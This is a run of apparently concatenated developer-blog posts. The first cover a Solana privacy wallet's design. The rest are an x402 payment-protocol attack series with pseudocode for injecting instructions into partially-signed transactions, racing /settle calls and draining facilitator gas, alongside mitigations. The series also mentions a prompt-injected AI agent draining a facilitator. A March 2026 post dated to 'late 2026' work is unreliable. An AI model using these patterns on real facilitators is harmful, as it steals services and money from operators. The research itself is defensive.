Most toast libraries on React are ugly or overengineered. `sonner` is what happens when someone with taste shipped a toast library and called it done. The fact that it stacks gracefully and gets out of the way is the entire pitch.

### `lucide-react` for icons, no exceptions

Across the entire Zera codebase — wallet, SDK, [zera-med](/blog/zera_med_zk_fhir/), [zeraswap](/blog/zeraswap_compressed_amm/), even [this blog](/blog/why_i_started_zera_labs/) — every single icon is from Lucide. One pack, one stroke weight, one optical alignment. This is the kind of decision that costs nothing to make in week one and is impossible to retrofit in year two.

## The mobile drawer, ported

You can see the design language travel between repos in the [responsive HUD work on `zera_med_demo`](/blog/zera_med_responsive_hud/) — the mobile drawer that ships in `zera-wallet-demo` is the same component, give or take a tag, that we shipped in the medical-records demo two months earlier. That is what a design system is *for.* Not the Tailwind tokens, not the icon pack, but the muscle memory of "we have already solved 'phone with a sidebar that needs to also work on desktop.'"

## What the production wallet adds

The demo is the lab. The production wallet adds three things the demo deliberately does not:

1. **Hardware-key signing** — Ledger and (TODO: Dax confirm — Trezor support is in progress) — for the operator desktop case. The demo signs entirely in the browser; the production app refuses to broadcast a transaction whose proof was constructed without a hardware-signed approval.
2. **Native iOS / Android shells** — TODO: Dax confirm exact framework choice (Tauri vs. React Native vs. native). The demo runs in a browser; the production app needs Secure Enclave access and the platform NFC stack, which means a real native shell.
3. **Compliance hooks** — for the venues that need them. ZERA is token-agnostic and venue-flexible. The wallet has a clean integration point for permissioned KYC layers without making them mandatory for the protocol. Reasonable people can disagree about how much compliance belongs at the wallet edge; we ship the surface and let the customer choose.

## The question I get asked the most

> *Why a wallet at all? Isn't ZERA an SDK story?*

The SDK is for developers. The wallet is for everyone else. **You cannot ship privacy as a primitive that only protocol engineers can integrate.** If we want a unified shielded pool to be the default for stablecoin transfers in 2027, the on-ramp has to be a wallet you can hand to your accountant, your sister, and an autonomous AI agent — and it has to feel obvious to all three.

The wallet is the product. The SDK is the *contract.*

## Further reading

- [zera-wallet-demo on GitHub](https://github.com/Dax911/zera-wallet-demo) — the reference UX
- [wallet.zeralabs.org](https://wallet.zeralabs.org) — production landing
- [Zera Wallet v3 ZKP](/blog/zera_wallet_v3_zkp/) — the commit log
- [The MCP server inside zera-sdk](/blog/mcp_server_inside_zera_sdk/)
- [A Privacy Demo That Works on a Phone](/blog/zera_med_responsive_hud/) — sibling design work
- Solana Foundation, *Wallet Standard* — the React-side wallet-adapter contract


---

# Zera Wallet v3: ZK Proofs in a Tauri Webview

Canonical: https://blog.skill-issue.dev/blog/zera_wallet_v3_zkp/
Description: A Tauri 2 desktop wallet that proves Groth16 in the browser, persists encrypted notes locally, talks NFC to physical bearer cards, and never lets the private key out of Rust.
Published: 2026-03-24T15:45:10.000Z
Tags: zera, wallet, tauri, rust, react, zk, groth16, nfc


The Zera SDK is the engine. The wallet is the car. Three weeks after the SDK shipped, I started building the v3 desktop wallet — Tauri 2 + React 18, with a Rust keystore that never lets the seed touch JavaScript and a webview that runs Groth16 provers in WebAssembly.

The initial commit is [`39b5518`](https://github.com/Dax911/zera-wallet-demo/commit/39b55182b349da8896cd841dad753bb162ddcc48) on 2026-03-24. The follow-up — the one that made the wallet actually do anything — is [`660283f` — `ZKP core, real data layer, wallet unlock, note scanning`](https://github.com/Dax911/zera-wallet-demo/commit/660283fe9a16d7f1a471cdf06542f5592bf8ba9f) the same day. The third commit, [`d061813`](https://github.com/Dax911/zera-wallet-demo/commit/d061813aa98d83aa7dfcb59f0a7ce7c5ef3993d2) on 2026-03-25, added P2P send + NFC bearer cards. Three commits, ~3000 lines of meaningful code, full privacy stack.

This post is about what's load-bearing in those three commits.

## The trust model: Rust holds the key

The hardest design decision in any Tauri wallet is *where the private key lives*. The naive thing is to load it into JavaScript, sign in JS, send. The naive thing leaks the key the first time anything in the JS supply chain ([Rusty Pipes](/blog/rusty_pipes/), say) gets compromised.

The right thing is `keystore.rs`:

```rust
// src-tauri/src/keystore.rs
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct WalletFile {
    pub version: u32,
    pub salt: String,        // Argon2 salt, hex
    pub nonce: String,       // ChaCha20 nonce, hex
    pub ciphertext: String,  // Encrypted payload (JSON: { seed, entropy })
    pub pubkey: String,      // base58, unencrypted for display before unlock
}

struct WalletPayload {
    seed: String,            // 64-byte BIP39 seed for mnemonic, 32-byte raw key otherwise
    entropy: String,         // 16-byte entropy for 12-word recovery
    key_type: String,        // "mnemonic" or "raw_key"
}
```

The seed lives in `$APPDATA/zera/wallet.enc`, encrypted with ChaCha20-Poly1305 under a key derived from the user's password via Argon2id. The pubkey is stored in plaintext so the unlock screen can show "Unlock wallet ABC123..." before the user types anything.

The frontend never sees the seed. Ever. Sign requests go through a Tauri command:

```rust
#[tauri::command]
pub async fn sign_and_send_transaction(/* ... */) -> Result<String, String> {
    // Decrypt seed using the in-memory unlock key, sign tx, send to RPC,
    // return signature. Seed is zeroized at end of scope.
}
```

If the frontend gets compromised, the worst it can do is request signatures. It cannot exfiltrate the key.

## Importing keys from Phantom and Solflare without breaking the trust model

The keystore had to handle three import paths from day one:

1. **Generate a new wallet** — fresh BIP39 mnemonic, derive seed, encrypt, store.
2. **Import a 12/24-word mnemonic** — same as above but seeded by user input.
3. **Import a raw private key** — base58 from Phantom, base64 from Solflare, base58 from `solana-keygen`. Raw 32-byte key gets put in `seed` with `key_type = "raw_key"` so the unlock path knows not to treat it as BIP39 entropy.

The viewing-key derivation is web-wallet-compatible — same HKDF schedule the original web wallet used so a user could import the same seed and see the same shielded notes. That backwards-compat constraint cost me a day; without it the wallet would have been quietly incompatible with the SDK's `MemoryNoteStore` semantics in practice.

## Groth16 in a webview

The wallet ships [the same circuit files as the web wallet](https://github.com/Dax911/zera-wallet-demo/tree/660283fe9a16d7f1a471cdf06542f5592bf8ba9f/public/circuits): `deposit.wasm`, `deposit_final.zkey`, `withdraw.wasm`, `withdraw_final.zkey`, `transfer.wasm`, `transfer_final.zkey`, plus `relayed_withdraw` variants. The Tauri webview loads them statically, runs `snarkjs.groth16.fullProve`, gets a proof + public signals out, and hands them back to Rust to format for Solana.

The split is intentional:

- **JS proves.** Because snarkjs is the canonical, audited Groth16 prover for circomlib circuits.
- **Rust signs.** Because the seed lives there.

The tx flow is therefore:

```
JS:    build inputs → snarkjs.fullProve → proof + publicSignals
JS:    send to Tauri command with proof, commitment, recipient
Rust:  decrypt seed → build solana tx (using SDK builders) → sign → send
Rust:  return signature to JS
JS:    on success, append note to encrypted note store
```

Snarkjs is heavy — about 30s on a cold proof, 5–8s warm — but the alternative is "ship a Rust-native Groth16 prover," which is a multi-week project of its own and which would still need to consume the same `.zkey` artifacts.

## Notes are private. Notes are also a database.

A privacy wallet without a note store is just a key manager. Every shielded transaction produces output notes that *only the recipient can decrypt*, and the recipient has to scan the chain to find them. The wallet ships [`src/lib/noteEncryption.ts`](https://github.com/Dax911/zera-wallet-demo/blob/660283fe9a16d7f1a471cdf06542f5592bf8ba9f/src/lib/noteEncryption.ts), which implements ECDH + nacl.box (XSalsa20-Poly1305). The plaintext format is versioned and binary-packed:

```ts
// v2: single note — 169 bytes plaintext
// [0x02][amount u64 LE][secret 32B][blinding 32B]
// [asset 32B][commitment 32B][nullifier 32B]

// v3: note pair — 145 bytes plaintext
// [0x03][amt1 u64 LE][secret1 32B][blinding1 32B]
//       [amt2 u64 LE][secret2 32B][blinding2 32B]
// Used for splits where both outputs go to the same key.
// Packing two notes into one nacl.box saves 265 bytes on-chain.

const BINARY_V2_LEN = 1 + 8 + 32 + 32 + 32 + 32 + 32; // 169
const BINARY_V3_LEN = 1 + 72 + 72;                    // 145
```

Why not JSON? Two reasons:

1. **Bytes are cheap on Solana, JSON is expensive.** Every byte you encrypt is a byte you store on-chain (or in an encrypted memo). 169 binary bytes compress to about 80% the size of equivalent JSON.
2. **Format versioning is robust.** A leading tag byte (0x02, 0x03) lets older wallets recognize unsupported formats and fall back gracefully instead of decrypting garbage.

## Note persistence

The thing nobody warns you about with privacy wallets: **if you lose your local note store, you can only recover funds by scanning the on-chain Merkle tree with your viewing key.** That scan is slow, expensive in RPC calls, and has to be done from scratch every time. So the wallet auto-persists notes to disk:

```ts
// src/lib/notePersistence.ts
const NOTES_FILE = "zera/notes.json";
const NFC_FILE   = "zera/nfc-cards.json";

export async function saveNotesToDisk(notes: any[]): Promise<void> {
  await mkdir("zera", { baseDir: BaseDirectory.AppData, recursive: true })
    .catch(() => {});
  await writeTextFile(NOTES_FILE, JSON.stringify(notes, null, 2),
    { baseDir: BaseDirectory.AppData });
}
```

Notes auto-save on every change and load on startup. The encrypted-at-rest version of this is on the roadmap; for v3 the notes file is plain JSON in `$APPDATA`, which assumes the user trusts their own machine. The next iteration wraps it in the same ChaCha20 layer the keystore uses.

## NFC bearer cards

The wallet's most futuristic feature — and the one most likely to feel like sci-fi to anyone who hasn't used it — is NFC bearer cards. From the `d061813` commit message:

> NFC page: real shielded notes, arbitrary amounts, custom mint, write pool notes to tags, read tags back into pool

The model: take an unspent shielded note from your pool, serialize the encrypted plaintext into an NFC tag's NDEF record, hand the physical card to someone. They tap it on their wallet, the wallet pulls the encrypted blob, decrypts it with their viewing key, and the note becomes theirs. No on-chain transaction at all. The note's nullifier is only revealed when the recipient eventually spends it.

This is the "physical cash" path I'd been sketching since the [a better cryptocurrency](/blog/a_better_crypto/) post a year earlier, and the [m0n3y voting proposal](/blog/m0n3y_naming_a_dream/). The wallet shipped it as a real button. PC/SC + Proxmark3 hardware support, both supported in `src-tauri/`.

## Trade-offs

**Why Tauri instead of Electron?** Because Electron ships a 200MB Chrome runtime and its security model has been a moving target for years. Tauri's webview + minimal-IPC model gives me the trust boundary I need (Rust ↔ JS) for free.

**Why snarkjs in JS instead of a Rust prover?** Because snarkjs is the audited canonical prover for circomlib circuits. Rolling my own Rust prover would have shifted weeks of audit risk onto a Rust crate that nobody else uses.

**Why plain JSON note persistence in v3?** Because the alternative was holding the wallet release for an encrypted-at-rest design pass that was already a TODO. v3 ships now, encryption-at-rest of the note store ships in v3.1.

**Why ship a viewing-key compatibility layer with the web wallet?** Because the only thing worse than a privacy wallet you can't import into is a privacy wallet that *silently* doesn't import the same notes. Compatibility is a design constraint that has to be in v1 of any new client.

## What this taught me

The trust boundary of a wallet is the most expensive surface in the project. Every subsystem you build either reinforces it (Rust holds the seed; JS sees ciphertexts) or breaks it (JS reads the keystore; key escrow services). v3 reinforced. The cost: ~30% of the codebase is the IPC plumbing. The benefit: a [Rusty Pipes](/blog/rusty_pipes/) compromise of the JS supply chain doesn't lose anyone's funds.

## Further reading

- [zera-wallet-demo on GitHub](https://github.com/Dax911/zera-wallet-demo)
- [Initial v3 commit](https://github.com/Dax911/zera-wallet-demo/commit/39b55182b349da8896cd841dad753bb162ddcc48)
- [ZKP core + real data layer](https://github.com/Dax911/zera-wallet-demo/commit/660283fe9a16d7f1a471cdf06542f5592bf8ba9f)
- [P2P send + NFC bearer notes](https://github.com/Dax911/zera-wallet-demo/commit/d061813aa98d83aa7dfcb59f0a7ce7c5ef3993d2)
- [Tauri 2.x docs](https://v2.tauri.app/)
- [snarkjs](https://github.com/iden3/snarkjs) — the Groth16 prover this wallet ships in JS.
- [Building the Zera SDK day one](/blog/zera_sdk_scaffolding/) — the engine this wallet drives.


---

# x402 Vector 2: partial-signing instruction injection

Canonical: https://blog.skill-issue.dev/blog/x402_partial_signing_injection/
Description: The x402 client builds and partially signs the entire VersionedTransaction. A facilitator that validates structure but not bytes can co-sign a tx with extra clawback / drain instructions appended after the legitimate transfer.
Published: 2026-03-23T18:00:00.000Z
Tags: security, x402, solana, transaction-injection, research


import { Mermaid, TradeoffTable, Aside, Quote } from "@/components/mdx";

The trust split in x402 is unusual. The **client** builds the entire VersionedTransaction. The **facilitator** signs as feePayer and submits. The facilitator pays gas; the client picks the recipient, the amount, the compute budget — *and the rest of the instructions*.

Most facilitators validate that the tx contains a `TransferChecked` for the agreed-upon (mint, amount, recipient). They do not always validate that **nothing else** is in the tx. That's the bug.

Post 3 of the [x402 attack surface series](/series/x402-attack-surface/).

<Aside kind="warn">
PoC code at [Dax911/x402_mal](https://github.com/Dax911/x402_mal) targets only my mock facilitator. Reproducing this against a real facilitator without permission is unethical and probably illegal under CFAA.
</Aside>

## The trust gap

A typical x402 transaction looks like:

```
[0]  ComputeBudgetProgram::SetComputeUnitLimit(40_000)
[1]  ComputeBudgetProgram::SetComputeUnitPrice(5)
[2]  TokenProgram::TransferChecked(amount=1000, mint=USDC, src, dst)
```

The facilitator's `/verify` endpoint typically:

1. Decodes the tx.
2. Checks `feePayer == self.address`.
3. Loops through instructions; finds the `TransferChecked`; asserts amount + recipient match.
4. Returns 200.

What the facilitator usually does **not** check:

- The presence of *additional* instructions after the transfer.
- Whether the recipient ATA's authority is a token-2022 mint with a transfer hook that calls back into a malicious program.
- Whether the `mint` field of the `TransferChecked` matches the protocol-spec'd USDC mint *byte-for-byte* (the SPL token program checks the mint's pubkey but doesn't enforce a particular mint).

## Three injection patterns

### Pattern A: clawback via post-transfer CPI

Append an instruction that calls a custom program. The custom program runs with the client's authority on the *destination* ATA — wait, that's not how Solana auth works.

Re-think: the client signs only their key. So instructions that are appended cannot use the *facilitator's* authority. They can:

- Use the client's keypair (signing already authorized).
- Use any account the client controls.
- Burn compute units the facilitator pays for.

**Useful injection #1 (Pattern A1):** Burn the facilitator's CU budget. Append a 30k-CU compute-burning instruction (e.g., a no-op loop in a custom program). The transfer succeeds at 5k CU; the burn at 30k CU; the facilitator pays for 35k CU instead of 5k CU. Per-tx gas drain magnified ~7×.

**Useful injection #2 (Pattern A2):** Force a fail *after* the transfer succeeds. If the facilitator's verify path checks the transfer instruction is present but doesn't simulate the whole tx, an instruction that asserts a false condition (e.g., a custom `assert_value_equal(0, 1)`) **fails the entire transaction** and rolls back the transfer. The client's PAYMENT-RESPONSE looks valid (signed, submitted), the facilitator paid gas, but no token actually moved. Combined with the [settlement race](/blog/x402_settlement_race_condition/), this is monetisable.

### Pattern B: token-2022 transfer hook

If the destination ATA is a token-2022 mint *with a transfer hook program*, every transfer to that ATA triggers a CPI into the hook program — which runs with the privileges of the SPL Token-2022 invoker.

The client controls the destination. If the client picks a destination ATA on a mint with a hostile transfer hook, the hook runs after the transfer with arbitrary code. The protocol spec says "use USDC", but spec compliance is enforced by the facilitator's validator, not by Solana itself.

### Pattern C: minimum-amount string trick

Combined with [Vector 9 (amount string parsing)](/blog/x402_amount_string_parser/): the PAYMENT-REQUIRED says `"1000"` (= $0.001). The client encodes `"01000"` in the SPL transfer ("1000" with a leading zero, which the validator's `parseInt` accepts). The actual on-chain value transferred is `1000` in raw lamports (or whatever the `parseInt` evaluates to in the validator vs the SPL program). Some validators round on parse; some don't. Mismatch = pay less than required.

## PoC sketch

```rust
// Pseudocode — see repo
fn craft_malicious_tx(facilitator: &Pubkey, client: &Keypair, amount: u64) -> VersionedTransaction {
    let mut ixs = vec![
        compute_budget::set_unit_limit(40_000),
        compute_budget::set_unit_price(5),
        spl_token::transfer_checked(...),
    ];

    // Inject a CU-burner that fires AFTER the transfer.
    ixs.push(custom_program::cu_burn_30k());

    let blockhash = recent_blockhash();
    let msg = Message::new_with_blockhash(&ixs, Some(facilitator), &blockhash);
    let mut tx = VersionedTransaction { signatures: vec![Signature::default()], message: msg.into() };

    // Client signs; facilitator's signature stays default until /settle.
    let client_sig = tx.message.serialize().sign(client);
    tx.signatures[1] = client_sig;
    tx
}
```

## Mitigations

The fix is also small but architecturally pointed:

1. **Whitelist instruction prefix.** The facilitator's `/verify` should require the instruction list to be *exactly* `[ComputeBudgetSetUnitLimit, ComputeBudgetSetUnitPrice, TransferChecked]`, no extras. Reject anything with a 4th instruction.
2. **Pin compute unit limit.** Don't accept client-supplied CU budgets above 5k. Inject your own.
3. **Pin the mint.** Don't accept any mint in the transfer; require an exact match against the facilitator's allowlist (`USDC mainnet only`).
4. **Simulate before sign.** Run `simulateTransaction` against the partially-signed tx before adding feePayer. If sim fails or returns unexpected logs, reject.
5. **Reject token-2022 mints with hooks** unless the hook program is on an allowlist.

(1) and (2) together kill Patterns A and the CU-burn variant. (3) and (5) together kill Pattern B. (4) is good defense in depth.

## Why the spec hasn't fixed this

Probably because the original x402 design assumes the client is benign — they're paying for content, why would they sabotage their own payment? The threat model that breaks this is "the client is also the merchant" or "the client is also a competing facilitator" or just "the client is a researcher". Once you accept that the spec must work against malicious clients, Pattern A1 (CU burn) is the single highest-impact fix.

## Bibliography

- [Dax911/x402_mal/research/instruction-injection/](https://github.com/Dax911/x402_mal/tree/main/research)
- Solana Token-2022 Transfer Hook: [docs.solanalabs.com](https://spl.solana.com/token-2022/extensions#transfer-hook)
- ComputeBudgetProgram: [solana.com/docs](https://solana.com/docs/core/transactions/runtime#compute-units)

Previous: [Settlement race ←](/blog/x402_settlement_race_condition/) · Next: [Facilitator gas drain →](/blog/x402_facilitator_gas_drain/)


---

# x402 Vector 1: settlement race condition

Canonical: https://blog.skill-issue.dev/blog/x402_settlement_race_condition/
Description: Coinbase x402's verify→settle pipeline isn't atomic. A client can submit the same PAYMENT-SIGNATURE to multiple facilitators in parallel, or race the facilitator with a direct on-chain submission. Double-spend within blockhash validity (~60s).
Published: 2026-03-22T18:00:00.000Z
Tags: security, x402, solana, race-condition, research


import { Mermaid, TradeoffTable, Aside, Quote } from "@/components/mdx";

The cleanest vulnerability in the x402 protocol — also the one that's easiest to fix and the one most likely to bite production deployments. This post walks through the settlement race in detail, gives a PoC layout, and lists the mitigations that'd close it.

Post 2 of the [SOLMAL series](/series/x402-attack-surface/) on x402.

<Aside kind="warn">
The PoC code is in [Dax911/x402_mal/research](https://github.com/Dax911/x402_mal/tree/main/research) and runs only against a mock facilitator. **Do not run this against a production facilitator without their explicit permission.**
</Aside>

## The bug

The x402 settlement flow has two server-side calls:

1. `POST /verify { tx, expected }` — facilitator returns 200 if the partially-signed tx is well-formed and pays the right amount.
2. `POST /settle { tx }` — facilitator co-signs as feePayer and submits the tx to Solana.

In every reference implementation I've seen, these are independent HTTP handlers with no shared lock. **A signed PAYMENT-SIGNATURE can be submitted to `/settle` more than once.** The facilitator will:

- Re-co-sign with feePayer (idempotent — same tx hash).
- Re-submit to Solana RPC.

Solana itself deduplicates — the second submission of an already-confirmed tx returns `AlreadyProcessed`. Fine. But there's a window between *the client submitting tx_a* and *Solana confirming tx_a* during which the *same client signature* on a *different transaction* (tx_b, with a different blockhash or a different recipient ATA) can also be settled. The client paid once; the merchant believed they were paid; the underlying ledger says otherwise.

## Three concrete scenarios

### Scenario 1: parallel facilitator submission

If a network has multiple facilitators (Coinbase plus third parties), the client can:

1. Build PAYMENT-SIGNATURE.
2. POST to facilitator A's `/settle`.
3. POST the same payload to facilitator B's `/settle` 50ms later.
4. Both facilitators submit. The first to land on Solana wins; the loser sees `AlreadyProcessed`.

Result: only one tx settles on-chain, but both facilitators consumed gas, and **both believed they had successfully settled the payment** (depending on RPC client timing). Some facilitator implementations cache `/settle` responses by request hash; others cache by tx signature; others don't cache. The cache discrepancy is the monetisable bit.

### Scenario 2: client-side bypass

1. Client receives `PAYMENT-REQUIRED` with feePayer=facilitator.
2. Client builds PAYMENT-SIGNATURE.
3. Client **also** builds a *different* tx with the same client signature but a different recipient ATA — say, a second ATA the client controls.
4. Client submits the second tx directly to Solana RPC.
5. Client submits PAYMENT-SIGNATURE to `/settle`.

If Solana confirms the *second* tx first (because the facilitator's RPC is in a different region with higher latency), the merchant's real settlement fails. The client never paid the merchant; the client paid themselves. The merchant might still grant access if they don't watch the on-chain confirmation tightly.

### Scenario 3: rapid replay

Submit the same `PAYMENT-SIGNATURE` to the same facilitator 50 times in 1 second. If the facilitator's `/settle` handler doesn't lock-and-dedupe on the request payload hash, every call submits to Solana. 49 of 50 will fail with `AlreadyProcessed`, but during the racing window some may compute against stale state and reach unexpected outcomes (rent reclaims, ATA-init double-fee, etc.).

## PoC structure

The repo contains a Rust harness in [research/race-spammer/](https://github.com/Dax911/x402_mal/tree/main/research):

```rust
// Pseudocode — see repo for the runnable version.
async fn race_test(facilitator: &Url, client: &Keypair) -> RaceResult {
    let req = build_payment_request(client);
    let sig = build_payment_signature(&req, client);

    let handles: Vec<_> = (0..50).map(|_| {
        let url = facilitator.clone();
        let s   = sig.clone();
        tokio::spawn(async move {
            settle(&url, s).await
        })
    }).collect();

    futures::future::join_all(handles).await
}
```

50 parallel `/settle` calls. Count: how many got HTTP 200? How many led to a confirmed Solana tx? How many cost the facilitator gas?

## Mitigations

The fix is small but it does have to be coded:

1. **Atomic verify+settle.** Combine the two endpoints, or have `/settle` re-run verify under a lock keyed by the tx signature.
2. **Per-signature dedup.** Cache settled tx signatures in Redis / KV with TTL = blockhash validity (~60s) + safety margin. Reject duplicate `/settle` calls with HTTP 409.
3. **Confirmation polling.** `/settle` should not return until the tx is confirmed (level=`processed` minimum, ideally `confirmed`). Currently most implementations return on RPC submit, not on confirmation.
4. **Per-client rate limit on `/settle`.** Even with dedup, a malicious client can create N distinct signatures. Limit per-IP and per-client-key.

Of these, (2) is the easy win. KV cache keyed by signature, TTL of 90 seconds. Stops scenarios 1 and 3 dead.

## What this means for x402 deployments

If you're operating an x402 facilitator: implement (2) before going live. The TTL needs to be longer than blockhash validity to cover the late-replay edge case. Use Cloudflare Workers KV, AWS DynamoDB, Redis — anything with sub-100ms eventual consistency.

If you're a merchant integrating x402: don't grant content access until the facilitator's `/settle` returns AND your own RPC poll confirms the tx. The current spec lets merchants act on the facilitator's word; the spec needs an explicit "signature confirmed at slot S" field, and merchants need to poll until they see that slot ≤ current_slot - 32 (final).

## Bibliography

- [Dax911/x402_mal SOLMAL.md](https://github.com/Dax911/x402_mal/blob/main/SOLMAL.md) — full threat model
- Solana Foundation. *Transaction confirmation levels.*
- Coinbase Developer Platform. *x402 specification.*

Previous: [Series intro ←](/blog/x402_attack_surface_intro/) · Next: [Partial-signing instruction injection →](/blog/x402_partial_signing_injection/)


---

# x402 Vector 3: facilitator gas drain

Canonical: https://blog.skill-issue.dev/blog/x402_facilitator_gas_drain/
Description: x402 facilitators pay all transaction fees and the spec defines no per-client rate limit. A flood of valid-looking transactions that fail at maximum compute-unit consumption is a per-request economic attack on the facilitator.
Published: 2026-03-21T18:00:00.000Z
Tags: security, x402, solana, dos, economic-attack, research


import { Mermaid, TradeoffTable, Aside, Quote } from "@/components/mdx";

The x402 protocol has a fee model where the **facilitator pays gas**. This is the entire UX win — AI agents don't need SOL to make payments. It's also the entire economic attack surface.

Post 4 of the [x402 attack surface series](/series/x402-attack-surface/).

<Aside kind="warn">
Like every post in this series: the PoC code at [Dax911/x402_mal](https://github.com/Dax911/x402_mal) targets only my mock facilitator. Don't run the gas-drain PoC against production infrastructure unless that infrastructure belongs to you.
</Aside>

## The economics

For each settled x402 transaction, the facilitator pays:

- 5,000 lamports base fee (Solana minimum, ~$0.001 at SOL=$200).
- `compute_unit_limit × compute_unit_price` priority fee (configurable, max 5 microlamports/CU per spec, max 40,000 CU).
- Worst-case priority fee: 40,000 × 5 = 200,000 microlamports = 0.0002 SOL ≈ $0.04.

So per tx, facilitator outflow is bounded at ~$0.041. That's fine for legitimate traffic. It's not fine when an attacker generates valid-looking PAYMENT-SIGNATUREs at 1000 req/sec.

## The attack: maximum-CU failure

Three flavors of failing transaction that maximally hurt the facilitator:

### Flavor A: legitimate-looking transfer that fails post-CU-burn

Recall from [Vector 2](/blog/x402_partial_signing_injection/): the client controls the instruction list. Append a custom-program call that:

1. Burns 35,000 CU in a no-op loop.
2. Asserts `False`, failing the entire tx.

Outcome: facilitator pays 5k base + 175,000 microlamports priority = full $0.041. Tx reverts. Merchant gets nothing. Repeat at scale.

### Flavor B: valid-but-rejected mint

Specify the wrong mint in the SPL `TransferChecked`. The instruction validates client-side because the client controls the bytes. The instruction fails on-chain because the mint pubkey doesn't match the ATA.

Solana's runtime evaluates the entire instruction *before* it can detect the failure — so the facilitator pays the full CU consumption.

### Flavor C: ATA derivation mismatch

The client supplies a destination ATA that derives from `(owner=A, mint=USDC)` but specifies `(owner=B, mint=USDC)` in the instruction. Solana's `transfer_checked` verifies the ATA is consistent with the supplied owner+mint and rejects. CU consumed: full instruction cost.

All three flavors share the property: **the facilitator's `/verify` returns 200 (validators check structure, not bytes)**, the facilitator pays gas to settle, the tx reverts on-chain, the merchant doesn't get paid, the attacker has cost the facilitator money for nothing in return.

## Quantification

A single attacker on a residential Comcast connection can sustain ~100 req/sec to a single facilitator endpoint. At ~$0.04/tx:

- 100 req/sec × 60 sec/min × $0.04/tx = **$240/min in facilitator gas**
- Across an 8-hour business day: **$115,200/day**

Multiple attackers behind different IPs (e.g., a botnet of 1000) and the daily cost crosses $100M. Facilitator margins on legitimate x402 traffic are pennies per transaction. A sustained gas-drain attack burns the facilitator's runway in hours.

## Why the spec doesn't address this

The spec assumes a "trusted client" model. AI agents operate semi-autonomously and **don't have an incentive to attack the facilitator they're paying** — except when they do. Specific incentive structures that make this attractive:

1. A competitor (rival facilitator) wants the target out of business.
2. A nation-state actor wants to disrupt agentic-economy infrastructure.
3. A researcher (this writer) wants to demonstrate the bug.
4. An AI agent that's been adversarially prompted to drain its own facilitator's funds.

Threat (4) is the one I find most interesting. An LLM that's been jailbroken via prompt injection could — at no cost to itself — execute the gas-drain attack against the facilitator, which is operationally what x402 was designed to make easy.

## Mitigations

In rough order of effectiveness:

1. **Per-client rate limit on `/settle`.** The facilitator must enforce N transactions per client-keypair per minute. Default ~10 sounds fine; can be raised for trusted clients via API key.
2. **CU budget cap.** Facilitator overrides client's `set_unit_limit` and `set_unit_price` instructions; pins to ≤5,000 CU and 1 microlamport/CU. Reduces worst-case outflow per tx by ~10×.
3. **Pre-flight simulation.** Before adding feePayer signature, run `simulateTransaction`. If sim returns `Err`, reject before paying gas. Shifts cost to a quick simulation call.
4. **Reputation-based throttle.** Track each client-keypair's settlement success ratio. Drop clients with under 50% success rate to a lower rate limit.
5. **Stake-or-pay deposits.** Out-of-band: clients deposit a small SOL bond with the facilitator. Failed transactions debit from the bond. Removes the asymmetric-cost property entirely.

(1) is the bare minimum. (3) is the most operationally complex but also the most thorough. (5) is the Real Fix but requires protocol changes.

## What I'd do if I were operating an x402 facilitator

```python
# Pseudocode for the verify+settle endpoint
@app.post("/settle")
async def settle(req: SettleRequest):
    client_pk = extract_client_pubkey(req.tx)

    # 1. Per-client rate limit
    if not await rate_limit.allow(client_pk, max=10, window=60):
        return 429, "rate_limited"

    # 2. Re-validate (don't trust /verify)
    if not validate_tx(req.tx, expected_mint=USDC, max_cu=5_000):
        return 400, "invalid_tx"

    # 3. Pre-flight simulate
    sim = await rpc.simulate_transaction(req.tx)
    if sim.err is not None:
        # Failed simulation = don't pay gas
        return 400, "sim_failed"

    # 4. Add feePayer sig + submit
    signed = sign_with_feepayer(req.tx)
    sig = await rpc.send_transaction(signed)

    # 5. Wait for confirmation before returning success
    await rpc.confirm_transaction(sig, level="confirmed")

    return 200, {"signature": sig}
```

Cost of all this: ~50ms added latency per settlement, plus one extra RPC call. Worth it.

## Bibliography

- [Dax911/x402_mal/research/gas-drain-bench/](https://github.com/Dax911/x402_mal/tree/main/research)
- Solana Compute Unit Pricing: [solana.com/docs](https://solana.com/docs/core/transactions/runtime#compute-units)
- Cloudflare KV rate limiting patterns

Previous: [Partial-signing injection ←](/blog/x402_partial_signing_injection/) · Next: [AI-agent wallet drain →](/blog/x402_ai_agent_wallet_drain/)


---

# SOLMAL: the x402 attack surface (series intro)

Canonical: https://blog.skill-issue.dev/blog/x402_attack_surface_intro/
Description: Mapping the attack surface of Coinbase's x402 micropayment protocol on Solana. Series intro covering the verify→settle pipeline, the actor model, the 9 vectors, and the responsible-disclosure timeline.
Published: 2026-03-20T18:00:00.000Z
Tags: security, x402, solana, ai-agents, research


import { Mermaid, TradeoffTable, Aside, Quote } from "@/components/mdx";

Coinbase shipped [x402](https://x402.org/) — a micropayment protocol that piggybacks on HTTP 402 (Payment Required) — in late 2025. It is, on paper, brilliant: AI agents pay for API access via stablecoin micropayments embedded in HTTP headers, the merchant doesn't need to run a payment processor, and a third-party "facilitator" sponsors gas on Solana so the agent doesn't need any SOL.

In late 2026 I spent a few weeks staring at the protocol. I came away with **9 distinct attack vectors** plus a meta-finding about AI-agent wallets that is, I think, the single biggest risk. This post is the series opener.

<Aside kind="note">
This is published research. No specific vendor / facilitator was tested against without permission; the proofs-of-concept run against my own mock implementations. The repo is at [Dax911/x402_mal](https://github.com/Dax911/x402_mal) — public, MIT-licensed.
</Aside>

## The protocol in 30 seconds

Three actors: **client** (an AI agent with a Solana wallet), **resource server** (the API the agent wants to call), **facilitator** (validates payments, sponsors gas, settles on-chain).

<Mermaid id="x402-flow" code={`sequenceDiagram
  participant C as Client (AI agent)
  participant S as Resource Server
  participant F as Facilitator
  C->>S: GET /endpoint
  S-->>C: 402 + PAYMENT-REQUIRED header
  C->>C: Build partial VersionedTransaction<br/>(client signs, feePayer = facilitator)
  C->>S: GET + PAYMENT-SIGNATURE header
  S->>F: /verify (is this tx valid?)
  F-->>S: 200 ok
  S->>F: /settle (co-sign as feePayer, submit)
  F->>F: Submit to Solana
  F-->>S: 200 + signature
  S-->>C: 200 + content + PAYMENT-RESPONSE
`}/>

The Solana-specific bits:

- Client builds a `VersionedTransaction` with an SPL `TransferChecked` instruction.
- `feePayer` is the facilitator's address.
- Client only **partially signs** (their key); facilitator adds the feePayer signature.
- USDC mint: `EPjFWdd5AufqSSqeM2qN1xzybapC8G4wEGGkZwyTDt1v`. 6 decimals, so `"1000"` = $0.001.
- Compute budget capped at 40,000 CU, max 5 microlamports/CU.
- Blockhash valid ~60 seconds (151 slots).

## The 9 vectors

| # | Vector | Severity | Post |
|---|--------|----------|------|
